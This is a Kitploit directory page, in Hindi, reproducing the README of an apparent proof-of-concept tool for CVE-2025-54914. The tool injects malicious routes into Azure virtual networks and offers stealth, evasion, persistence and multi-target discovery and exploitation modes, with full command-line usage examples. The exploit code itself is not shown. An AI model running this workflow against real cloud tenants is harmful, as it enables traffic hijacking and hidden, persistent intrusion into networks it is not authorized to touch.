Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-54914-PoC — CVE-2025-54914 के लिए Azure Networking में शोषण, जो दुर्भावनापूर्ण रूट बनाता है, जिसमें चोरी-छिपे रहना, स्थिरता, बहु-लक्ष्य स्कैनिंग, और अधिकृत सुरक्षा परीक्षण के लिए रिपोर्टिंग शामिल है। | Kitploit
उपकरण/GitHubGitHub/ash1996x/cve-2025-54914-poc
टोहीस्थायित्व तंत्रभेद्यता विश्लेषणशोषणआईडीएस/आईपीएस से बचनापेनिट्रेशन टेस्टिंगक्लाउड सुरक्षा
GitHubash1996x/cve-2025-54914-poc

CVE-2025-54914-PoC

CVE-2025-54914 के लिए Azure Networking में शोषण, जो दुर्भावनापूर्ण रूट बनाता है, जिसमें चोरी-छिपे रहना, स्थिरता, बहु-लक्ष्य स्कैनिंग, और अधिकृत सुरक्षा परीक्षण के लिए रिपोर्टिंग शामिल है।

रिपॉजिटरी देखें
44250 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-54914 Azure रूट एक्सप्लॉइट

अवलोकन

यह CVE-2025-54914 Azure नेटवर्किंग रूट एक्सप्लॉइट का एक बेहतर कार्यान्वयन है। यह संस्करण मुख्य CVE कार्यक्षमता को बनाए रखता है और साथ ही स्थायित्व, चोरी, बहु-लक्ष्य स्कैनिंग, और त्रुटि प्रबंधन जैसी अतिरिक्त सुविधाएँ जोड़ता है।

सुविधाएँ

मुख्य CVE कार्यक्षमता

  • रूट निर्माण: Azure आभासी नेटवर्क में दुर्भावनापूर्ण रूट बनाता है
  • रूट विलोपन: सफाई के लिए बनाए गए रूट हटाता है
  • API अनुकूलता: Azure प्रबंधन API 2025-09-01 के साथ काम करता है
  • प्रमाणीकरण: Azure CLI और मैनुअल टोकन प्रमाणीकरण का समर्थन करता है

सुविधाएँ

  • चोरी तकनीकें: यादृच्छिक विलंब, उपयोगकर्ता एजेंट रोटेशन, अनुरोध अस्पष्टीकरण
  • स्थायित्व: अनुसूचित कार्य निर्माण, निरंतर निगरानी मोड
  • बहु-लक्ष्य स्कैनिंग: एक साथ कई लक्ष्यों की स्कैनिंग और शोषण
  • व्यापक रिपोर्टिंग: सफलता/असफलता विश्लेषण के साथ विस्तृत रिपोर्ट
  • त्रुटि प्रबंधन: सुंदर विफलता प्रबंधन और पुनर्प्राप्ति
  • कॉन्फ़िगरेशन प्रबंधन: JSON-आधारित लक्ष्य कॉन्फ़िगरेशन
  • लक्ष्य खोज: कमजोर संसाधनों की स्वचालित खोज
  • जोखिम मूल्यांकन: भेद्यता विश्लेषण और जोखिम स्कोरिंग

स्थापना

पूर्वापेक्षाएँ

root@kitploit:~
# Install Python dependencies
pip install requests

# Install Azure CLI (for authentication)
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

सेटअप

root@kitploit:~
# Make scripts executable
chmod +x exploit.py
chmod +x exploit_utils.py

# Authenticate with Azure
az login

उपयोग

मूल उपयोग

एकल लक्ष्य शोषण

root@kitploit:~
# Create route on single target
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

# Delete route
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --route-name "exploit-route-1" \
    --operation delete

बहु-लक्ष्य शोषण

root@kitploit:~
# Create configuration file
python exploit_utils.py discover --output targets.json

# Exploit all targets
python exploit.py --targets-file targets.json --operation create

स्कैन मोड

root@kitploit:~
# Scan targets without exploitation
python exploit.py --targets-file targets.json --scan-only

स्थायित्व मोड

root@kitploit:~
# Enable persistence with 30-minute intervals
python exploit.py --targets-file targets.json --persistence-mode --interval 30

उन्नत उपयोग

चोरी और गुप्तता

root@kitploit:~
# Custom delay ranges for evasion
python exploit.py \
    --targets-file targets.json \
    --delay-min 1.0 \
    --delay-max 5.0 \
    --max-workers 5

ड्राई रन मोड

root@kitploit:~
# Test without actual exploitation
python exploit.py --targets-file targets.json --dry-run

विस्तृत लॉगिंग

root@kitploit:~
# Enable debug logging
python exploit.py \
    --targets-file targets.json \
    --log-level DEBUG \
    --log-file exploit.log

कॉन्फ़िगरेशन

लक्ष्य कॉन्फ़िगरेशन प्रारूप

root@kitploit:~
{
  "targets": [
    {
      "subscription_id": "12345678-1234-1234-1234-123456789012",
      "resource_group": "production-rg",
      "vnet_name": "prod-vnet",
      "subnet_name": "prod-subnet",
      "route_name": "exploit-route-1",
      "address_prefix": "10.0.1.0/24",
      "next_hop_type": "VirtualAppliance",
      "next_hop_ip": "10.0.2.5",
      "api_version": "2025-09-01",
      "priority": 1
    }
  ],
  "metadata": {
    "description": "Target configuration for CVE-2025-54914",
    "created": "2025-01-09",
    "version": "1.0"
  }
}

पर्यावरण चर

root@kitploit:~
# Azure access token (alternative to Azure CLI)
export AZURE_ACCESS_TOKEN="your_token_here"

# Log level
export LOG_LEVEL="INFO"

उपयोगिता स्क्रिप्ट

लक्ष्य खोज

root@kitploit:~
# Discover all accessible targets
python exploit_utils.py discover --output discovered_targets.json

# Discover specific subscriptions
python exploit_utils.py discover \
    --subscription-ids "sub1" "sub2" \
    --output targets.json \
    --report discovery_report.txt

कॉन्फ़िगरेशन निर्माण

root@kitploit:~
# Generate exploit configuration from discovered targets
python exploit_utils.py config \
    --input discovered_targets.json \
    --output exploit_config.json \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

भेद्यता विश्लेषण

root@kitploit:~
# Analyze targets for risk assessment
python exploit_utils.py analyze \
    --input targets.json \
    --output vulnerability_report.txt

सुरक्षा सुविधाएँ

चोरी तकनीकें

  • अनुरोध समय: अनुरोधों के बीच यादृच्छिक विलंब
  • उपयोगकर्ता एजेंट रोटेशन: कई ब्राउज़र उपयोगकर्ता एजेंट
  • हेडर अस्पष्टीकरण: यथार्थवादी HTTP हेडर
  • SSL सत्यापन: उचित प्रमाणपत्र मान्यकरण

स्थायित्व तंत्र

  • अनुसूचित कार्य: विंडोज अनुसूचित कार्य निर्माण
  • निरंतर मोड: लंबे समय तक चलने वाला स्थायित्व
  • सत्र प्रबंधन: रनों में स्थिति संरक्षण
  • कॉन्फ़िगरेशन स्थायित्व: सेटिंग्स डिस्क पर सहेजी गईं

त्रुटि प्रबंधन

  • सुंदर गिरावट: व्यक्तिगत विफलताओं पर जारी रहता है
  • टाइमआउट संरक्षण: लटकते अनुरोधों को रोकता है
  • सिग्नल हैंडलिंग: व्यवधान पर साफ शटडाउन
  • संसाधन सफाई: बाहर निकलने पर स्वचालित सफाई

रिपोर्टिंग

एक्सप्लॉइट रिपोर्ट

  • संचालन परिणाम: प्रत्येक लक्ष्य के लिए सफलता/असफलता
  • समय जानकारी: निष्पादन टाइमस्टैम्प
  • त्रुटि विवरण: विस्तृत त्रुटि संदेश
  • सारांश आंकड़े: समग्र सफलता दर

खोज रिपोर्ट

  • लक्ष्य सूची: खोजे गए संसाधनों की पूरी सूची
  • सदस्यता विवरण: सदस्यता के अनुसार समूहित लक्ष्य
  • संसाधन विवरण: VNet, सबनेट, और स्थान जानकारी

भेद्यता विश्लेषण

  • जोखिम मूल्यांकन: उच्च/मध्यम/निम्न जोखिम वर्गीकरण
  • उत्पादन संकेतक: उत्पादन वातावरण की पहचान
  • टैग विश्लेषण: संसाधन टैग के आधार पर जोखिम स्कोरिंग

सर्वोत्तम अभ्यास

परिचालन सुरक्षा

  1. ड्राई रन का उपयोग करें: पहले --dry-run के साथ परीक्षण करें
  2. दायरा सीमित करें: गैर-उत्पादन वातावरण से शुरू करें
  3. लॉग की निगरानी करें: अप्रत्याशित व्यवहार के लिए लॉग की समीक्षा करें
  4. सफाई करें: परीक्षण के बाद बनाए गए रूट हटाएं

प्रदर्शन अनुकूलन

  1. वर्कर सीमाएं: सिस्टम क्षमता के आधार पर --max-workers समायोजित करें
  2. विलंब ट्यूनिंग: विलंब सेटिंग्स के साथ चोरी और गति को संतुलित करें
  3. बैच प्रोसेसिंग: बड़े पैमाने के संचालन के लिए लक्ष्य फ़ाइलों का उपयोग करें
  4. संसाधन निगरानी: निष्पादन के दौरान सिस्टम संसाधनों की निगरानी करें

त्रुटि पुनर्प्राप्ति

  1. लॉग जांचें: समस्या निवारण के लिए त्रुटि संदेशों की समीक्षा करें
  2. अनुमतियां सत्यापित करें: उचित Azure अनुमतियां सुनिश्चित करें
  3. नेटवर्क कनेक्टिविटी: इंटरनेट कनेक्टिविटी सत्यापित करें
  4. टोकन वैधता: Azure CLI प्रमाणीकरण स्थिति जांचें

समस्या निवारण

सामान्य समस्याएं

प्रमाणीकरण त्रुटियाँ

root@kitploit:~
# Re-authenticate with Azure
az login

# Check current account
az account show

# List accessible subscriptions
az account list

अनुमति त्रुटियाँ

root@kitploit:~
# Check required permissions
az role assignment list --assignee $(az account show --query user.name -o tsv)

नेटवर्क त्रुटियाँ

root@kitploit:~
# Test connectivity
curl -I https://management.azure.com

# Check proxy settings
echo $HTTP_PROXY
echo $HTTPS_PROXY

डीबग मोड

root@kitploit:~
# Enable detailed logging
python exploit.py --log-level DEBUG --log-file debug.log

# Check log file
tail -f debug.log

कानूनी और नैतिक विचार

⚠️ महत्वपूर्ण: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है।

  • प्राधिकरण आवश्यक: केवल उन प्रणालियों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है
  • कानूनी अनुपालन: स्थानीय कानूनों और विनियमों का अनुपालन सुनिश्चित करें
  • जिम्मेदार प्रकटीकरण: उचित चैनलों के माध्यम से कमजोरियों की रिपोर्ट करें
  • शैक्षिक उपयोग: यह उपकरण शैक्षिक और अनुसंधान उद्देश्यों के लिए है

लाइसेंस

यह परियोजना केवल अनुसंधान और शैक्षिक उपयोग के लिए लाइसेंस प्राप्त है। व्यावसायिक उपयोग के लिए स्पष्ट अनुमति आवश्यक है।

योगदान

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर ब्रांच बनाएं
  3. अपने बदलाव करें
  4. यदि लागू हो तो परीक्षण जोड़ें
  5. पुल रिक्वेस्ट सबमिट करें

सहायता

समस्याओं और प्रश्नों के लिए:

  1. समस्या निवारण अनुभाग देखें
  2. त्रुटि विवरण के लिए लॉग की समीक्षा करें
  3. विस्तृत जानकारी के साथ एक मुद्दा बनाएं
  4. प्रासंगिक कॉन्फ़िगरेशन और त्रुटि संदेश शामिल करें
टूल डाउनलोड करें